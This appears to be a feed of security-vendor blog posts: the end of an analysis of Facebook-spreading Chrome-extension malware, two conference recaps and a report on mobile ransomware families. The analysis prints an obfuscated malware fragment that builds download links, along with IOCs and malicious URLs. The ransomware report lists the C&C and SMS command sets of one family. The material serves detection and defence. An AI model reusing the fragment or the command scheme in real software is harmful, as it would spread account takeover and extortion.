Once the Chrome browser has been opened with the malicious extension, the Facebook page also opens in a new tab, luring a user into a connection. Once connected, a script starts to run in the background. This script iterates through three domains to capture the login attempt and send a malicious script that will regenerate the initial infection through Facebook.

Once the malware recognizes the Facebook login attempt, it releases a malicious data.js JavaScript file which launches the attack, inviting other Facebook members with a “mention” and a malicious link. In addition, the extension acts as a Man-In-The-Middle and can capture the entire traffic between the victim and the servers he request data from. This allows the actor to steal data and redirect it to his command and control servers or wrap the data in a log file and send it over a different channel.

The data in the JavaScript payload can be decrypted using a web proxy such as Fiddler, allowing for the inspection of the embedded URL, with a ready-to-download Trojan script.

Inspecting the code, a readable string looks very familiar. It is the initial infection link from the beginning of the article. In addition to the infection routine, an account-takeover script has also been also embedded in the same file with a privacy-settings changer, account data extractor and other tools.

lobalFunction[Y1h.J9Q](fbData[I], function(j, u) { var p = "post", L = "Comm", z = "mChat"; … Facebook[z](j, gF[Y1h.G3Q](50, 52), j); Facebook[L]("https://doc.google.com/uc?authuser=0&id=" + fbData[R] + "&export=download&o=" + gF[Y1h.u1Q](42)[Y1h.d99]()); Facebook[p](u, function(a) { Facebook[L]("http://www.facebook.com/" + a); }); }); fbData[b] = atob(fbData[S]); if (fbData[b][Y1h.w1Q](chrome[Y1h.h4X][Y1h.f59]) > -1) { var k = function(a) { fb[Y1h.N7Q] = a[Y1h.h4X][Y1h.f59]; }; k(chrome); sfkklglr(); new Image()["src"] = "//whos.amung.us/swidget/wixerr42"; } } catch (a) { nuid = globalFunction[Y1h.G3Q](100, 999); =console[Y1h.p89]("error " + a); new Image()["src"] = "//whos.amung.us/swidget/wixerr35"; …

To sum it up, the delivery of the malware was found to be very efficient and made its way through thousands of users in only 48 hours. The fast reaction from consumers and the media proved to be the core power driving awareness of this campaign. The social media network and service providers were also fast in blocking the attack.

Q&A:

Am I infected?

The easiest way to check if you are infected is to open your Chrome browser and look for the extension named thnudoaitawxjvuGB. For a more thorough check, click Start > Run > copy the following command: %AppData%\Mozila if the folder and files such as “autoit.exe” and “ekl.au3” are in it, the computer is infected.

I was infected, what can I do?

Logout from your Facebook account, close the browser and disconnect the network cable from your computer. It is recommended that you ask an expert to check the computer and clean out any remaining malware. In addition, install an updated anti-virus program.

Kaspersky Lab products detect and block the threat, preventing it from infecting the machine.

A friend mentioned me in a post. Should I click on it?

Yes, keep using your social media as you did in the past. Just be aware that files which you do not recognize should not be installed on your computer or mobile phone.

I opened the file through my mobile phone, am I infected?

If you don’t have a Windows phone you cannot be infected through your smartphone. This malware is compatible only with Windows environments.

How can I prevent myself from becoming a victim?

The more we use the Internet, the greater the risk of becoming a target. However, service providers such as cloud storage, social networks and security products work day and night to stay one step ahead of the threats and keep their users safe. If possible, exercise caution when going online and try not to let others lure you into content, however tempting, if you have any concerns about it.

IOCs: comment_27734045.jse 9D3DF2A89FDB7DA40CEB4DE02D605CFA Trojan-Downloader.Agent.JS.lee Autoit.exe Legitimate software — Ff.zip Empty zip file — Sabit.au3
Up.au3
Force.au3 88C2B5DC9B7862590B859FC2FCDEAF87 Trojan.Win32.Autoit.fdi Manifest.json 3C874BA389652FF33E535E5B3373FFDC Trojan.JS.Extension.g Bg.js B50005F142A547CF8CD579EFAB0139DC Trojan.JS.Agent.diw Ekl.au3 25C440B66B6C33F4F6A84A992DBB956B Trojan.Win32.Autoit.fdj Run.bat Autoit.exe loader — Ping.js Used for whos.amungs.us analytics — Ping2.js Used for whos.amungs.us analytics — ver.dat Contains version: 1.5 — data.js 1a48f277b8e99d5a9b6526e0b51edad4 Trojan.JS.Agent.diw Malicious URLs:

hxxp://userexperiencestatics[.]net/ext/autoit.jpg
hxxp://userexperiencestatics[.]net/ext/ff.jpg
hxxp://userexperiencestatics[.]net/ext/sabit.jpg
hxxp://userexperiencestatics[.]net/ext/ekl.jpg
hxxp://userexperiencestatics[.]net/ext/bg.jpg
hxxp://userexperiencestatics[.]net/ext/run.jpg
hxxp://userexperiencestatics[.]net/ext/up.jpg
hxxp://userexperiencestatics[.]net/ext/force.jpg
hxxp://userexperiencestatics[.]net/ext/ff.jpg
hxxp://corneliuspettus [.]com/fil.php
hxxp://lllllllllll[.]top/end.php?ref
hxxp://corneliuspettus [.]com/data.js
hxxp://appcdn[.]co/data.js
hxxp://friendsmu[.]com/data.js

Domains:

Friendsmu[.]com
Appcdn[.]co
Userexperiencestatics[.]net
Corneliuspettus[.]com
lllllllllll[.]top

### YSTS X: The highlights of the COOLEST security conference in Brazil

Thu, 06/30/2016 - 07:22

One day after BSides LatAm, it was the turn of another security conference in Brazil: You Shot The Sheriff, now in its tenth edition. Happening on one of the coolest days in Sao Paulo, the event took place at Villa Bisutti, where the whole event was very well organised.

The welcome coffee was a good opportunity to meet some friends and also make new ones, as the majority of the security professionals from Brazil and also other countries were attending the event.

Luiz, Nelson and Willian opened the event by talking about the difference between the first edition to the tenth, showing that it has become much more mature and professional but is still a challenge to make it happen. They also talked of their work to keep the event the same size, as they believe that increasing the number of attendees could decrease of the quality of the event, something they work hard to improve with each edition.

After that, Anchises Moraes from RSA opened the talks by presenting about the stone age and the computing era, comparing the information gathered from paintings on cave walls that could lead us to an understanding of what happened at that time, to the information that we are storing on internet that will stay visible to the next generation.

Following this, Andrey Plastunov talked about a different attack scenario, where instead of targeting the normal user it targets developers, by infecting source code, attacking source control and continuous integration software in order to steal credentials. He explained that in most cases the developer has too much access, allowing the attackers to steal information that usually is not found on normal users’ computers, like remote desktop connections, FTP accounts and so on.

Our own Dmitry Bestuzhev attracted attention with his talk about the mobile weapons used for cyber-espionage, by explaining in detail the level of information that could be gathered from samples found in the wild targeting Android, Windows Phone and also the almost untouchable iOS. In his talk Dmitry drew attention to the point that nowadays, where there is extensive end-to-end encryption, it is easier to collect the desired information by infecting the device rather than attacking software encryption.

After this talk lunch was available as well as the beer and drinks, and at this time people could take time to talk with the presenters, sponsors and friends. The environment was really cool and next to the bar was the preferred place to get together with other participants.

When the sessions restarted, it was the turn of Emmanuel Goldstein, 2600 hacking magazine editor, to talk about the challenging work of running a hacking magazine without any publicity; he also encouraged people to listen to what young people and hackers have to share, as they have too much to say that will also help us.

Another very interesting technical talk was presented by Igor, who did a live demonstration of creating a portable BTS (Base Transceiver Station) in order to perform a main-in-the-middle attack to intercept calls and SMS messages on 2G networks. On the stage he made a call to one of the participants and then reproduced the intercepted content.

In summary, it was an amazing event with excellent organization, a mix of technical and non-technical talks and a very selected group of security professionals, where you had a chance to talk and make connections. Of course I could not forget to mention the party at the end where the participants had another chance to enjoy beer and other good drinks as well as networking.

### KSN Report: Mobile ransomware in 2014-2016

Wed, 06/29/2016 - 07:00

Part 1. KSN Report: PC ransomware in 2014-2016

Statistics

The activity of mobile ransomware, although not as widely covered in the media as PC ransomware, also skyrocketed over the period covered by this report. Especially in the second half.

Fig. 12: The number of users encountering mobile ransomware at least once in the period April 2014 to March 2016

From April 2014 to March 2015, Kaspersky Lab security solutions for Android protected 35,413 users from mobile ransomware. A year later the number had increased almost four-fold to136,532 users. The share of users attacked with ransomware as a proportion of users attacked with any kind of malware also increased: from 2.04% in 2014-2015 to 4.63% in 2015-2016. The growth curve may be less that that seen for PC ransomware, but it is still significant enough to confirm a worrying trend.

The geography of mobile ransomware is quite similar to the one for PC ransomware, with a few notable differences. In 2014-2015 the percentage of mobile users attacked with ransomware was fairly low, much lower than that seen for PCs.

Country % of users attacked with
ransomware out of all users
encountering malware United States 10.4% Kazakhstan 7.8% Ukraine 6.7% Germany 4.5% United Kingdom 2.6% Russian Federation 2.5% Belarus 1.7% S. Arabia 1.6% Switzerland 1.5% Brazil 0.16%

Fig. 13: Top 10 countries with the highest percentage of mobile users attacked with malware Trojan-Ransom category as a proportion of users attacked with any kind of mobile malware. (Each country has more than 5,000 unique users of Kaspersky Lab products for Android devices). Period: April 2014 – March 2015.

As can be seen in Fig. 13, in 2014-2015 the list of countries where users were most likely to encounter mobile ransomware looked very different to the one based on data for PC users. The United States led the chart with 10.4% of users attacked with ransomware, followed by Kazakhstan (7.8%) Ukraine (6.7%) and Germany (4.5%). Russia was lower down the top ten list, mostly because the local threat landscape at the time was highly affected by Trojan-SMS malware.

In 2015-2016, the list changed significantly, both in terms of the order of countries and in the proportion of users encountering ransomware.

Country % of users attacked with
ransomware out of all users
encountering malware Germany 22.90% Canada 19.61% United Kingdom 16.13% United States 15.64% Kazakhstan 14.42% Italy 12.54% Netherlands 12.30% Spain 5.27% Russian Federation 4.91% Ukraine 4.63%

Fig. 14: Top 10 countries with the highest percentage of mobile users attacked with malware in the Trojan-Ransom category as a proportion of users attacked with any kind of mobile malware. (Each country has more than 5,000 unique users of Kaspersky Lab products for Android devices.) Period: April 2015 – March 2016.

Germany became the leader with 22.9% of attacked users, followed by Canada (19.61%), the UK (16.13%) and the US (15.64%).

Clearly the target profile of mobile ransomware is dramatically different to the one for PC ransomware. It is hard to say precisely why this is the case, but we can assume that in countries that feature at the top of the mobile ransomware list, mobile and e-payment infrastructure is much more developed and has deeper penetration than in countries that are at the bottom of the list or not on it at all. Criminals like to get as close to their victim’s money as possible and attacking a user who can transfer the ransom in couple of taps or clicks is likely to have the most appeal.

Main actors of mobile ransomware

Across the whole period covered by the report, Kaspersky Lab researchers were able to identify a few families of mobile ransomware that users of our products encountered most often. In 2014-2015 these were: Pletor, Fusob, Svpeng and Small. In 2015-2016, Svpeng significantly reduced its activity hitting just a small share of the attacked users.

At some point during 2014-2015, Svpeng – originally known as a banking malware – was modified by its creators to be able to lock an infected device. Since then we have tracked both versions of Svpeng: the banking one and the ransomware. The ransomware branch gained visibly in popularity during 2014-2015, accounting for 5.64% of users attacked with any malware.

This changed during the second period, with the ransomware dropping to the lower end of the Top 30 threats. However, the banking branch of Svpeng resumed activity, which probably means that the malware creators simply lost interest in developing the ransomware and decided to concentrate on the banking one.

Roughly the same thing happened to Pletor – the malware considered to be the first example of ransomware and allegedly created by the authors of the infamous Acecard banking Trojan. In 2014-2015 it secured a fairly visible share of the pie of mobile users attacked with ransomware, but by 2015-2016 it had disappeared from the top, leaving only three big ransomware families on the “market”.

Fig. 15: The distribution of the share of attacked users between the most active mobile ransomware families in 2014-2015 (left) in comparison to the one in 2015-2016 (right).

Another significant thing seen during the 24 months covered by the report was the competition between two big ransomware families: Small and Fusob. In 2014-2015, the Small family was the leader, at least in terms of the share of attacked users. It accounted for 69.11% of all users encountering mobile ransomware at least once. But a year later, the Fusob family had taken over the lead hitting 56.25% of users. The Small family, however, remained number two with 37.23% of attacked users. The Svpeng, Pletor, Small and Fusob malware are likely to be sold by their authors to other cybercriminals or propagated through affiliate networks – all four families have undergone a lot of modifications. However, Small and Fusob appear to have been modified the most and this is clearly visible in the statistics.

Unlike PC ransomware, which is already relatively widely covered by researchers from different companies, including Kaspersky Lab, mobile ransomware has so far not been researched in depth. In order to address this, we provide a brief description of the most widespread and dangerous mobile ransomware examples as of April 2016.

Fusob ransomware

In April 2016, Trojan-Ransom.AndroidOS.Fusob became the most popular mobile Trojan: users in more than 100 countries worldwide were attacked by this Trojan-Ransom program. The first samples of Trojan-Ransom.AndroidOS.Fusob were discovered by Kaspersky Lab experts in early January 2015.

Fig. 16: Message displayed by Fusob ransomware

Trojan-Ransom.AndroidOS.Fusob was most actively distributed in the following countries:

Country % of users attacked by Fusob Germany 41.5 United States 14.5 United Kingdom 11.4 Italy 8.8 Mexico 4.4 Canada 3.6 Switzerland 1.9 Netherlands 1.6 Spain 1.4 Japan 1.2

Fig.16: The percentage of users attacked with Fusob ransomware as a proportion of all users attacked with any kind of mobile ransomware

Once the Trojan is executed [?], it runs a check of the device language (Locale.getDefault().getCountry()), and for the following countries it will not perform any malicious actions:

• KZ Kazakhstan
• AZ Azerbaijan
• BG Bulgaria
• GE Georgia
• HU Hungary
• UA Ukraine
• RU Russian Federation
• AM Armenia
• BY Belarus

If the country is not included in the list, the Trojan asks for device administrator rights and displays a message notifying the user that the device is being updated. The device can be still used, but the Trojan blocks access to the device settings by overlaying them with its own window. This is how it protects itself from being removed.

Meanwhile, the Trojan collects information about the device and sends it to the attackers. In doing so, it uploads two different sets of data to the Command and Control (C&C) server. The first set of data contains information about the device, such as device model, the version of the operating system, etc. This data is encoded with the Base64 algorithm and uploaded to the criminals’ server. The second data set, among other things, contains the user location and the call log with names from the contact list. This set is encrypted by the AES algorithm and loaded to a malicious C&C server.

The Trojan then waits for the attackers’ command with the necessary data to block the device.

For this purpose, the Trojan uses an HTML file received from the C&C. The Trojan itself includes functionality that can be activated from this file.

Fig. 17: A fragment of Fusob ransomware’s code

Among several functions integrated into the Trojan, two functions cause particular concern. They are: getImage(), which takes a photo with the help of the device’s front camera, and inst() used to install a previously downloaded APK file.

The criminals usually demand between $100 and$200 to unblock the device. The ransom has to be paid in the form of codes from pre-paid iTunes cards.

Fig. 18. The dialog window to enter the code of the gift card in exchange for unlocking the device

This family is mainly spread via porn sites; its representatives usually appearing under the name xxxPlayer and mimicking a multimedia player application used for watching porn videos.

Fig. 19: An example of the kind of webpage through which the Fusob malware is distributed

On clicking the “Download App Now!” button, the Fusob ransom Trojan is downloaded onto the user’s device. Interestingly, after a while this site redirected us to another site, which began to extort $100 in a similar way to Fusob. Fig. 20: A web page that appears after the Fusob malware is downloaded. In addition, a number of cases have been registered recently where an exploit kit was used to deliver this Trojan to Android devices silently in the background. We have analyzed those sources of infection that were most active at the time of writing this report. Most of them are registered to email addresses in the yandex.ru domain. In addition, the majority of this Trojan’s C&C servers are hosted in Russia, or carry registration data that suggests the person who registered them speaks Russian. However, analysis of the large number of modifications of this Trojan, starting from the earliest incarnations, did not provide any evidence that could confirm the authors’ language. The only clue we could find in the code of the HTML file used to block the device is some commentary in Russian. All this, along with the fact that the Trojan doesn’t attack Russian users, suggests that either the authors of the Trojan or the criminals distributing it are Russian-speaking attackers. Fig. 21: A fragment of Fusob’s code pointing at the possible origin of its authors The Small ransomware In April 2016, over 12% of attacked users were hit by representatives of the Trojan-Ransom.AndroidOS.Small family, which made it the second most popular ransomware Trojan family. It has been on our radar since mid-June 2014. Almost 99% of users attacked by this Trojan are located in just three countries: Country % of attacked users Russian Federation 54.6 Kazakhstan 26.9 Ukraine 17.2 Fig. 22: Distribution of infection attempts by the Small ransomware in April 2016 This family can be divided into three main groups: The first group of the Trojan-Ransom.AndroidOS.Small family includes small and very basic ransom Trojans. Once run, they ask for device administrator rights to prevent the Trojan from being removed. Immediately after that they display a message demanding a ransom which appears on the screen overlaying all other windows. This makes it impossible to use the device. Fig. 23: Message displayed by the Small ransomware (group 1) They mainly target Russian-speaking users and demand about 700 to 3,500 rubles to unblock the device. There are also samples targeting English-speaking users. Their functionality is similar, but they demand$300 to unblock the device.

Fig. 24: Message displayed to English-speaking users by the Small ransomware (group 1)

The second group from the Trojan-Ransom.AndroidOS.Small family are encryptors. Their functionality is almost identical to that described above – the only difference is the fact that after blocking the device, they start encrypting files on the memory card.

Fig. 25: A fragment of code of the Small ransomware

The third group of the Trojan-Ransom.AndroidOS.Small family is a multifunctional ransomware Trojan. Its behavior depends on the commands it receives from the C&C. Once run, the Trojan asks for the device administrator rights and loads information about the device to a malicious server. This information includes the phone number, the device model, the IMEI, and the version of the operating system. In addition, the Trojan is registered in the GCM system. The Trojan can receive commands from both the C&C and via GCM. It can perform the following commands:

• START – start the main service of the Trojan
• STOP – stop the main service of the Trojan
• RESTART – restart the main service of the Trojan
• URL – change the C&C address
• MESSAGE – send an SMS to a specified number with a specified text
• UPDATE_PATTERNS – update the rules for processing incoming SMSs
• UNBLOCK – disable the device administrator rights
• UPDATE – download a file form the specified URL and install it
• CONTACTS – send out a specified SMS to all contacts from the list of contacts
• PAGE – address a specified C&C for a command
• ALLMSG – upload all SMSs from the device to the criminals’ server
• ALLCONTACTS – upload all contacts from the device to the criminals’ server
• ONLINE – address the C&C
• NEWMSG – save a specified SMS on the device
• LOCKER – display text with the ransom demand
• LOCKER_UPDATE – update the text with the ransom demand
• LOCKER_BLOCK – block the device
• LOCKER_UNBLOCK – unblock the device
• CHANGE_GCM_ID – change GCM ID

Once launched, the Trojan also intercepts incoming SMSs. It processes them in accordance with the rules received from the C&C. In addition, it can receive the following commands via SMS:

• 3458 – disable the device administrator rights
• Deblock – unblock the device
• hi – enable mobile data transfer
• ask – disable mobile data transfer
• privet – enable WiFi
• ru – disable WiFi
• 393838 – in addition to the command the message should contain a new encrypted C&C address

In most cases we received similar commands to block the device with a ransom demand to the tune of 1900 rubles.

“command”: “job”, “data”: {“command”: “LOCKER”, “data”:{“payMsg”: “To pay the fine, transfer no less than 1,900 rubles to the phone number: +79688343708 from any terminal to top up mobile accounts in Russia! “}}}”

We also received several commands to send SMSs to the number of a major Russian bank. This trick can be used to steal money from a bank account if it is associated with the victim’s phone number.

The ransomware Trojans of this family are mainly distributed via porn sites; however, we also registered them in SMS spam.

The C&C registration data, the area where the Trojan is distributed, and the lines of Russian in its code suggest that the Trojan-Ransom.AndroidOS.Small family was developed by Russian-speaking writers.

Svpeng ransomware

Over 97% of users attacked by this family of ransomware Trojans were located in the US. In April 2016, we detected this family in a total of 9 countries. We first discovered this ransomware Trojan family in June 2014 and believe it was created by the same attackers as the banking Trojan Svpeng.

Once run, the Trojan requests device administrator rights. It then collects the information that it requires: the list of calls and the history of visited sites; it also takes a picture with the device camera. Then the Trojan blocks the device by overlaying all windows with an HTML file. With the help of this file it can get access to previously prepared information.

Fig. 26: The message displayed by Svpeng ransomware

In most cases the Trojan demands $500 to unblock the device. Like other groups of mobile ransomware, it is distributed via porn sites. Differences between PC and mobile ransomware Unlike PC ransomware, most of the mobile examples are rather simple blockers that use some of the technical features of the Android OS in order to show the window with the ransom message on top of other windows. From time to time Kaspersky Lab researchers discover examples of Android-ransomware capable of encrypting files on the infected device. However, Kaspersky Lab experts don’t believe that encryption ransomware for mobile will undergo any noticeable development in the future. This is because of the security features implemented recently into the Android OS, which limits the ability of third-party apps to get unlimited access to users’ files. Also, encryption is not as effective on mobile as it is on a PC, because the Android OS and popular Android apps often come with features that enable data to be backed-up automatically to the cloud, which is obviously not the case for PCs. In short, criminals targeting mobile devices don’t need to invest resources in the development of encryption malware, since the damage it can do is limited. The same cannot be said for classic blockers; these are much more efficient on a mobile device than on a PC. The difference is simple: if a PC user encounters blocker ransomware – even a sophisticated one – then in the worst case scenario they will be able to remove the hard drive from the infected PC, attach it to another PC and manually remove all malicious files. It is almost impossible to do the same with a mobile device as its hardware is impossible to remove easily and analyze with the help of an extraneous device. Perhaps this is the main reason why the mobile ransomware landscape is mostly a landscape of blockers. How it is done As mentioned before, crypto-ransomware has existed for years. Sporadic attempts to turn crypto-ransomware into a profitable business-model were spotted by Kaspersky Lab researchers as early as 2006 with the Gpcode ransomware family and the copycats that followed. The approach was standard: after a successful infection, the malicious program would show a ransom message and would demand money, usually a hundred dollars or so, sent through a bank transfer. Fig. 27: An example of a message left by criminals on a PC infected with Gpcode-like ransomware, from 2008 But there was no big criminal-to-criminal industry behind those initial attempts to spread crypto-ransomware. Usually it was the work of a single criminal or a small group of criminals, and although in the period from 2006 to 2011, Gpcode or similar samples of crypto-ransomware appeared regularly on our radar, the intensity of attacks at that time cannot be compared with what we see today. Several years after the last waves of attacks with Gpcode and its followers, crypto-ransomware was chosen by big financial malware actors as a way of earning illegal income. Perhaps the brightest example of this trend was the infamous Gameover Zeus botnet. Originally created for stealing credentials in order to access online banking services, at some point the botnet creators started to use it to infect victims with Cryptolocker ransomware and demand a ransom. The damage done by this botnet was extensive, but luckily, in 2014, following an international effort led by Europol and the FBI, the botnet was shut down. Allegedly, the ransomware scheme was a sort of side business for the creators of the botnet – a way of monetizing those PCs in the botnet that had no access to online banking systems. A few other groups of criminals known for spreading financial malware have also been spotted undertaking crypto-ransomware activities. But at the end of the day, this model hasn’t become widespread and it is not what brought crypto-ransomware to the level of attacks that we see today. How it works: the business of affiliate networks It is no secret that most of today’s crypto-ransomware has Russian roots, both in terms of the authors of the malicious code and of the actors who spread the malware and demand the ransom. The groups behind ransomware attacks are mainly small or medium-sized and they cooperate by means of a business scheme: affiliate networks. Small groups often consist of non-professional but very motivated members willing to invest money and time into any cybercriminal activity promising money. Middle-sized groups usually contain some professional programmers and web technology specialists. They are able to produce malware and to build and support the IT infrastructure that forms the technological backbone for the malware. Over the last few years, middle-sized groups have been able to create several “products” that, in the case of ransomware comprise a kind of DIY set that less-skilled criminals can buy, modify into their own unique version of the malware, and then use to make money. For this they would tune the set in order to make it work with certain C&C servers, encrypt files with certain keys etc. After that they would either try to spread the newly-created malware themselves (investing additional money into buying traffic, spam mailings or renting exploit-kits), or would urge other criminals – entry-level ones – to do this through affiliate programs. Through this business scheme, multiple affiliates receive a unique version of the malware from the owner of the affiliate network, and take charge of its distribution: spreading it through websites, spam and other ways of propagation. Every time a victim infected with such malware pays the ransom, the affiliate receives some cash from the owner of the network, who gets the lion’s share of the ransom. There is nothing new in the affiliate network business model being used by cybercriminals in order to ease the propagation of malware. In the past, this model has been used to propagate Blockers, SMS-Trojans and of course banking Trojans, along with thousands of different adware and pornware strings. Fig. 28: A description of the capabilities that the affiliate program would give a participant. Along with s strong encryption algorithm, this affiliate program offers its partners a user-friendly interface for a landing page in a Tor-network which would serve as a web-proxy for ransom transactions This business model appears to be more viable for ransomware than for any other type of malware. The main reason for this is the fact that victims of ransomware tend to pay for releasing their files and thereby pour money into the underground economy of cybercrime. Why is ransomware skyrocketing? First and foremost, because users pay. It seems that in recent years regular users and companies have reached the point where the information stored on their PC is valuable enough to consider paying a ransom on demand. The massive transition in organizations towards the use of digital documents and automated business processes for accounting and other day-to-day activities is helping to accelerate this. A company whose tax documentation, for example is encrypted with ransomware just before the deadline for submitting returns to the tax regulator, has no choice but to pay the ransom – and this is what criminals exploit. As a result, crypto-ransomware has become, almost uniquely, a type of malware that can cause tangible business damage by making critical operational files unreadable. This damage cannot not always be rolled back, so sometimes paying the ransom is the only way to retrieve the data. Another important factor which has positively affected the rise of ransomware is the appearance of new payment tools. New crypto-currencies, for example are now often accompanied by how-to-use guides “for dummies” that teach mainstream users how to use such currencies. In the past, cybercriminals tended to use either legitimate payment systems or semi-legitimate services in order to transfer money to each other and from their victims. The problem for criminals is that legitimate payment systems, reacting to the rise in fraudulent payments, have started to track and block suspicious transactions, making money transfer a far more risky business for cyber-crooks. With underground and semi-legal payment systems the problem is that no guarantees are given to the users of such systems (no refunds, no protection from other criminals) and the privacy of these transactions is also always questionable. At the end of the day the fate of each known underground payment system (from E-gold to Liberty Reserve) is always the same: sooner or later it goes down, due to a law enforcement investigation or some other reason. That is why money transaction for cybercriminals has always been an area of risk. But things changed significantly when the price of crypto-currencies – bitcoin in particular – rose and stabilized enough to allow a lot of users to convert real money. Criminals have started to exploit the advantages crypto-currencies over other type of e-currency: anonymity and a distributed nature, which both allow them to hide fraudulent transactions and make it impossible for a law enforcement agency to do anything, as the system has no center and no owner. These features help to support individual privacy rights but, unfortunately also give cybercriminals a very reliable and secret payment tool. The main outcome of this is that ransomware has become the new black in the underground. It has acquired a fairly viable criminal ecosystem where, powered by money from attacked users, specific niches for different types of criminals have emerged. Affiliate networks have become the main way for all of them to generate profit. And – what is more dangerous – they have opened doors to the criminal world for those who doesn’t have enough knowledge and expertise to develop their own ransomware. With multiple affiliate networks on the market, they need only basic skills in programming and web design. Another important reason for the rise in crypto-ransomware is the fact that law enforcement can find it difficult to respond. Most victims of cryptors are ordinary people who do not always report the attack to the police. This leaves law enforcement agencies and forensic experts with a very limited amount of evidence to work with: law enforcement representatives generally have too few reported cases to justify an investigation, and forensic specialists lack enough actual evidence to use against the actors behind crypto-ransomware. At Kaspersky Lab we are eager to change this situation and we are ready to help law enforcement agencies and other interested organizations with technical analyses of malware. The pressure of the law is a valuable tool in the fight against ransomware. This was proven by the case against the criminals who spread screen blocker malware in 2010. The arrests that took place in August 2010 in Russia showed other cyber-criminals that the consequences of their actions could be severe. The wave of screen blockers started to fade after those arrests and we believe that the same approach would work with crypto-ransomware criminals. Conclusions and Predictions Based on the statistics and trends described in this report, we were able to come to the following conclusions: • On PCs, encryption ransomware has removed blockers from the threat landscape making the Trojan-Ransom category almost synonymous with encryption ransomware. • In contrast, mobile ransomware is all about malware with the ability to lock the screen of the device, and it is unlikely that crypto-ransomware for mobile devices will gain in popularity among cybercriminals anytime soon. • Although the statistics show that attacks with crypto-ransomware operate on a massive scale, responsibility for most of the attacks rests with just a few groups of malware, most of them spread via affiliate programs. • One of the main reasons for the current skyrocketing of encryption ransomware is the availability of off-the-shelf sets for the creation of new versions of ransomware. As was the case with blockers and banking Trojans, encryptors are the new black of the cybercriminal underground. • Payment and infrastructure anonymity tools help criminals to leverage ransomware schemes with a relatively low of risk of being compromised. That, combined with the availability of plug-and-play malicious tools has brought a lot of low-skilled cybercriminals into the market. Alongside these conclusions we believe that the current ransomware threat landscape provides a good basis for several predictions on how this threat will evolve in the future. Predictions: • The extortion model is here to stay. Mobile ransomware emerged as a follow-up to PC ransomware and it is likely that it will be followed-up with malware targeting devices that are very different to a PC or a smartphone. These could be connected devices: like smart watches, smart TVs, and other smart products including home and in-car entertainment systems. There are a few proof-of-concepts for some of these devices, and the appearance of actual malware targeting smart devices is only a question of time. • As legal action is one of the few way to actually disrupt the activity of groups behind crypto-ransomware, more arrests of ransomware dealers will take place. In 2015, Kaspersky Lab assisted the Dutch police in the investigation of the CoinVault ransomware attacks. The result of this investigation was the arrest of two suspects and the publication of decryption keys online. New arrests are a must for an effective fight against crypto-ransomware as they significantly increase the risks for criminals embarking on such malicious activity. • Technologies to protect users from encryption ransomware will be created. Kaspersky Lab products are equipped with special technology that can detect an attempt by an unknown application to encrypt files, and create back-up copies of these files, thus saving users’ data. We expect similar technologies to be created by other security vendors. What to do in order to protect yourself from crypto-ransomware attacks While crypto-ransomware is one of the most dangerous types of malware ever created, and the consequences of it could be really severe, we at Kaspersky Lab believe that there are ways to protect yourself or your organization against this threat. Tips to consumers: • Back-up is a must. If you ever thought that one day you would finally download and install that strange boring back-up software, today is the day. The sooner back-up becomes yet another rule in your day-to-day PC activity, the sooner you will become invulnerable to any kind of ransomware • Use a reliable security solution. And when using it do not turn off the advanced security features which it most certainly has. Usually these are features that enable the detection of new ransomware based on its behavior. • Keep the software on your PC up-to-date. Most widely-used programs (Flash, Java, Chrome, Firefox, Internet Explorer, Microsoft Windows and Office) have an automatic updates feature. Keep it turned on, and don’t ignore requests from these applications for the installation of updates. • Keep an eye on files you download from the Internet. Especially from untrusted sources. In other words, if what is supposed to be an mp3 file has an .exe extension, it is definitely not a musical track but malware. The best way to be sure that everything is fine with the downloaded content is to make sure it has the right extension and has successfully passed the checks run by the protection solution on your PC. • Keep yourself informed of the new approaches cyber-crooks use to lure their victims into installing malware. For this, read the news and specialized information resources like Kaspersky Lab’s Securelist.com and Kaspersky Daily. • If for some reason your files are encrypted with ransomware and you are asked to a pay ransom, don’t pay. Every bitcoin transferred to the hands of criminals builds their confidence in the profitability of this kind of cybercrime, which in its turn leads to the creation of new ransomware. At the same time, a lot of security companies, including Kaspersky Lab fight ransomware on daily basis. Sometimes it is possible to create a decryption tool for certain kinds of ransomware, and sometimes as a result of cooperation with law enforcement agencies, it becomes possible to get the encryption keys for certain families of ransomware, which could eventually lead to decryption of your files. Last but not least: the creation, spreading and demanding of a ransom for decryption are all actions that are defined as criminal in most countries around the globe. Report an attack to the police in order to start an investigation. Tips to businesses • Back-up is a must. Upon the infection of your corporate PCs, the ransomware is likely to start encrypting files that are required for the daily work of your company. If it is technically impossible to back-up all the files you have in the corporate network, choose the most critical (accounting documents, clients’ data, legal documents etc.), isolate them and back-up regularly. • Use a reliable, corporate-grade security solution and don’t switch off its advanced features, as these enable it to catch unknown threats. • Educate your personnel: very often the ransomware infection happens due to a lack of knowledge about common cyberthreats and the methods criminals use to infect their victims. • Undertake regular patch management. • Avoid paying a ransom and report the attack to police. Kaspersky Lab offers multi-layered protection against this widespread increasing threat. Kaspersky Lab’s solutions combat all known types of ransomware to secure user’s data. When these solutions are in place, most ransomware is “caught” when it is attempting to penetrate a device. Nonetheless, even if malware does manage to sneak through, there is another layer of protection – System Watcher technology – that is able to block and roll back malicious changes made on a device, such as the encryption of files or blocked access to the monitor. ### The first BSides Latin America, this time in Sao Paulo Tue, 06/28/2016 - 08:18 As time goes by, each year we have more and more BSides events all over the world where the information security community can get together in a laid back atmosphere without the usual formalities found in other conferences. For starters, anyone can be a part of a BSides, the entrance is free and the call for papers doesn’t focus so much on the history of the presenter but rather on the value of the information they are going to share. This year we had the first BSides Latin America conference, which joined the efforts of many other BSides organizers around the region. While the weather in Sao Paulo didn’t help much during those days, little did it matter since a full day of workshops and trainings preceded the conference day where three simultaneous tracks took place. It was interesting to see how popular was the “Python for Kids” workshop, in which you could really see what BSides is all about. Sharing information and teaching what you know, giving your time for free to the community and expecting nothing in return. Just seeing the enthusiasm demonstrated by this new generation of hackers and information security aficionados makes you go back to your roots and remember why one is a part of this exciting community. The talks were as diverse as the presenters, covering topics ranging from ransomware, to hardware cryptography and some advanced persistent threat speeches mixed in between. All the presenters adjusted the presentation to their audience making each talk unique and engaging. These weren’t university lectures but a group of friends discussing about information security topics. My colleagues Thiago Marques and Roberto Martinez gave the audience a detailed tour around the malicious activities found nowadays in Latin America and how the scenario has changed drastically over the years. Cibercriminals are upgrading their skills and toolset in order to achieve higher code quality, as well as resorting to more advanced infection and propagation techniques. Exchanging knowledge with eastern Europe crews has become the de-facto standard in regionalized cybercrime. In addition, Fabio Assolini, described a series of attacks against network devices, DNS services, and popular advertisement networks such as Google Adsense, where local bad guys are silently and massively pilfering bank accounts without so much as a byte of malware nor a single phishing e-mail. This presentation highlighted how attacks against internet infrastructure in Latin America are leading us to a scenario of pandemic distrust against the most fundamental services and the true 